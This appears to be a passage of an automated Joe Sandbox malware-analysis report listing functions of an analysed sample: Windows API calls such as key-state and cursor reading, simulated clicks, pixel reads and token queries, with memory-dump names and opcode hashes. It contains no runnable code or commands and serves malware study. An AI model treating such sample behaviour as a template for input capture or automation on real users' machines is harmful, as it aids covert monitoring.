                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: b4e80fd45e65bb7e1970e5a8ce16efe3d57b1d036f4ffccebe1a3b90245b013a
                                                        • Instruction ID: 2f20e66f04342ba63a7dd3887771991a6a5ac6fe218aaafe3c62d5e869a64f99
                                                        • Opcode Fuzzy Hash: b4e80fd45e65bb7e1970e5a8ce16efe3d57b1d036f4ffccebe1a3b90245b013a
                                                        • Instruction Fuzzy Hash: 2251E639A00215DFCB01EF65C985EAEBBF5EF09714B1480A9E809AB362CB31ED55DB50
                                                        Function 0014A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b1ccf7553f6727a7bd098328d1d15f5244ad83d1bcefbd33a2377d7be670f5db
                                                        • Instruction ID: 3f842da3ab6d1a381ea69bb9b736c472ea33c710d70ac07d97e159f0cc8ab83e
                                                        • Opcode Fuzzy Hash: b1ccf7553f6727a7bd098328d1d15f5244ad83d1bcefbd33a2377d7be670f5db
                                                        • Instruction Fuzzy Hash: B241F679A84104AFD724DF28CC48FA9BBA9EF09720F970169F916A72F1C730AD41DB51
                                                        Function 000C2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 000C2357
                                                        • ScreenToClient.USER32(001857B0,?), ref: 000C2374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 000C2399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 000C23A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 9ce7cda5b90411e6c200216369aec1ba33b4aeca75144fcd05e2f13d87cdc622
                                                        • Instruction ID: 548eebc89350a321e67df2cff9e6c2db72ff939a8bf00365dcf1b98c9c24e6ab
                                                        • Opcode Fuzzy Hash: 9ce7cda5b90411e6c200216369aec1ba33b4aeca75144fcd05e2f13d87cdc622
                                                        • Instruction Fuzzy Hash: C9419235604109FBDF259F68C844FEDBBB4BB05360F204319F829926A0CB349E90EF91
                                                        Function 001163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001163E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00116433
                                                        • TranslateMessage.USER32(?), ref: 0011645C
                                                        • DispatchMessageW.USER32(?), ref: 00116466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00116475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 7d81a254ce531a2f0e6fe5a7857f8a55600cc0ba31092d64b542d3d4a647a23d
                                                        • Instruction ID: 412713542e3ff2ee0ac42557e2743bc68ec3b35e3af5c3b68eedc2bc8a50a469
                                                        • Opcode Fuzzy Hash: 7d81a254ce531a2f0e6fe5a7857f8a55600cc0ba31092d64b542d3d4a647a23d
                                                        • Instruction Fuzzy Hash: 9731F231900612EFDB2CCFB4CC44BF67BADEB01300F54417AE425C29A0EB2699C9DBA0
                                                        Function 00118A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00118A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00118ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00118AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00118AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00118AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 5afb4296e495432303ae43611b419d3d006baa3f3ad06c5d3f7c83f42751c638
                                                        • Instruction ID: 66828b2bc2f76b4f505a70a76d7a190a0a0e325bd47f283f159a43457dfef0c9
                                                        • Opcode Fuzzy Hash: 5afb4296e495432303ae43611b419d3d006baa3f3ad06c5d3f7c83f42751c638
                                                        • Instruction Fuzzy Hash: 5A31C071500219EBDF18CFA8E94CADE7BB5EF05315F10822AF925E72E0C7B09994DB90
                                                        Function 0011B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0011B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0011B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0011B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0011B27F
                                                        • _wcsstr.LIBCMT ref: 0011B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: 8e6e181792f63048c50432c778a60b316b81f5478be22de416f45ac2a04f4161
                                                        • Instruction ID: b84021cee6c958f3a14c5c28aecf7db46532af1e83ad491b979ecdadc86389c3
                                                        • Opcode Fuzzy Hash: 8e6e181792f63048c50432c778a60b316b81f5478be22de416f45ac2a04f4161
                                                        • Instruction Fuzzy Hash: FA21D7712082407BEB295B759C89EBF7B9CDF4A750F11413DF805DA1A2EFB1EC819660
                                                        Function 0014B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0014B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0014B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0014B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00130E90,00000000), ref: 0014B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 78b6d3a8ba5438b7bff46967f28ae689eb0296f00e21cf98f6830f63239b98bc
                                                        • Instruction ID: 625ae69949a6f898c5604b3ec2b7ddf7178b41338a4442b96d5a01d584a786ea
                                                        • Opcode Fuzzy Hash: 78b6d3a8ba5438b7bff46967f28ae689eb0296f00e21cf98f6830f63239b98bc
                                                        • Instruction Fuzzy Hash: 4B21B171918651AFCB149F389C84A6A3BA5FB06721F114728F932D76F0D730E9618B90
                                                        Function 00119307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00119320
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00119352
                                                        • __itow.LIBCMT ref: 0011936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00119392
                                                        • __itow.LIBCMT ref: 001193A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 3232d3ac1bba0bb120c3ab4b700771e6c9b73594faf05704f5da9a41dd38631f
                                                        • Instruction ID: 324efb9f2a92f9ee44106791ea0f2bf70dc9f16bbc69163377c6efdb862cb9fd
                                                        • Opcode Fuzzy Hash: 3232d3ac1bba0bb120c3ab4b700771e6c9b73594faf05704f5da9a41dd38631f
                                                        • Instruction Fuzzy Hash: 42213430701208BBDB15AB758C99EEE7BA8FB49720F044039F928EB2D1D7B08D818791
                                                        Function 00135A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00135A6E
                                                        • GetForegroundWindow.USER32 ref: 00135A85
                                                        • GetDC.USER32(00000000), ref: 00135AC1
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00135ACD
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00135B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 9a974424cb2ccaca4c9fa16b747970297786f4cfab3a3c0542399a56e6a6e930
                                                        • Instruction ID: e28968cee380409d3b5ec3304f7027cdeda09572342052f9ce45339b3c57cf24
                                                        • Opcode Fuzzy Hash: 9a974424cb2ccaca4c9fa16b747970297786f4cfab3a3c0542399a56e6a6e930
                                                        • Instruction Fuzzy Hash: D521A139A00104AFDB04EF64DC89AAABBE5EF49710F15807DF80997762CB30AC41CB90
                                                        Function 000C12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000C134D
                                                        • SelectObject.GDI32(?,00000000), ref: 000C135C
                                                        • BeginPath.GDI32(?), ref: 000C1373
                                                        • SelectObject.GDI32(?,00000000), ref: 000C139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: ad6aa765875d5fcf493d89036328dcec9a11ae3fbab56f44a86e0188d25ed8c6
                                                        • Instruction ID: 07d26072d4d878346ac5dfebdf604f0e8d89a3cba442e593f434a734ae8e3b18
                                                        • Opcode Fuzzy Hash: ad6aa765875d5fcf493d89036328dcec9a11ae3fbab56f44a86e0188d25ed8c6
                                                        • Instruction Fuzzy Hash: 46214134800648EFDB119F66DC48BAD7BEAFB02725F14421BF810969B1D7719AD2DF90
                                                        Function 0011BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 0a932bfdd43947b9c1a53ec2b277ae8cb86913bd4a72f9112e245c4ca35465b6
                                                        • Instruction ID: e175180495f65d050a57f5e87362ffb3388ab40c7cc6cf98a0a7d2b6eb9f7d45
                                                        • Opcode Fuzzy Hash: 0a932bfdd43947b9c1a53ec2b277ae8cb86913bd4a72f9112e245c4ca35465b6
                                                        • Instruction Fuzzy Hash: 3F0192B3608109BBD60C6A126D82FFBB35CDF61398B044035FD15AA383EB71DE5492E1
                                                        Function 00124A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00124ABA
                                                        • __beginthreadex.LIBCMT ref: 00124AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00124AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00124B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00124B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 660fc23eb6da44af280838c9a7d21f209ecb97f20c39f6621b8ddb1bb1ec8b64
                                                        • Instruction ID: 185a5a15b8c2646d2b88d96cbd5892e0413c1cd5627c1887738b750091d9aea3
                                                        • Opcode Fuzzy Hash: 660fc23eb6da44af280838c9a7d21f209ecb97f20c39f6621b8ddb1bb1ec8b64
                                                        • Instruction Fuzzy Hash: AC110876904258FBC7108FA8AC08A9B7FADEB45320F144269F814D3760D771C9548BA1
                                                        Function 00118202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0011821E
                                                        • GetLastError.KERNEL32(?,00117CE2,?,?,?), ref: 00118228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00117CE2,?,?,?), ref: 00118237
                                                        • HeapAlloc.KERNEL32(00000000,?,00117CE2,?,?,?), ref: 0011823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00118255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 28d8c3b06bf801348f4c521ccd7af7f09cbc0c17a55e0078fdfe15ba3a3ad674
                                                        • Instruction ID: 8cd7940907fdb3649e9ecdd71de1372425749a1e48b7cac3fc346cba78a1b27a
                                                        • Opcode Fuzzy Hash: 28d8c3b06bf801348f4c521ccd7af7f09cbc0c17a55e0078fdfe15ba3a3ad674
                                                        • Instruction Fuzzy Hash: 29016979200208BFDB254FA6DC48DAB7BACEF8B754B60443DFD09C2220DB318C81CA60
                                                        Function 0011710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?,?,00117455), ref: 00117127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?), ref: 00117160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 0011716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: f48f953e9721404acc7355d53f87f1c5da87117134c6e5932a51f878e3479397
                                                        • Instruction ID: dab637ee6261d156f2f3ce84232ef4ff33f60d29019bada83ddfbec253d161f4
                                                        • Opcode Fuzzy Hash: f48f953e9721404acc7355d53f87f1c5da87117134c6e5932a51f878e3479397
                                                        • Instruction Fuzzy Hash: B301BCBA600209BBCB144F64DC44AEABBBCEB45791F140078FD04D6320D732DD828BA0
                                                        Function 00125244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00125260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0012526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00125276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00125280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: b727393d4a9eebbc6731b6e1e71106a9461d899bf2b23acac90ed489fb446dbc
                                                        • Instruction ID: eb8f209a490149850a2e3c1093fdb4577e54a7326b2261b1b9a26102b25e8131
                                                        • Opcode Fuzzy Hash: b727393d4a9eebbc6731b6e1e71106a9461d899bf2b23acac90ed489fb446dbc
                                                        • Instruction Fuzzy Hash: DE016D35D01A2DDBCF04DFE4EC88AEDBB79FB0DB11F410059E941B2290DB3095A187A1
                                                        Function 0011810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00118121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0011812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0011813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00118141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00118157
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
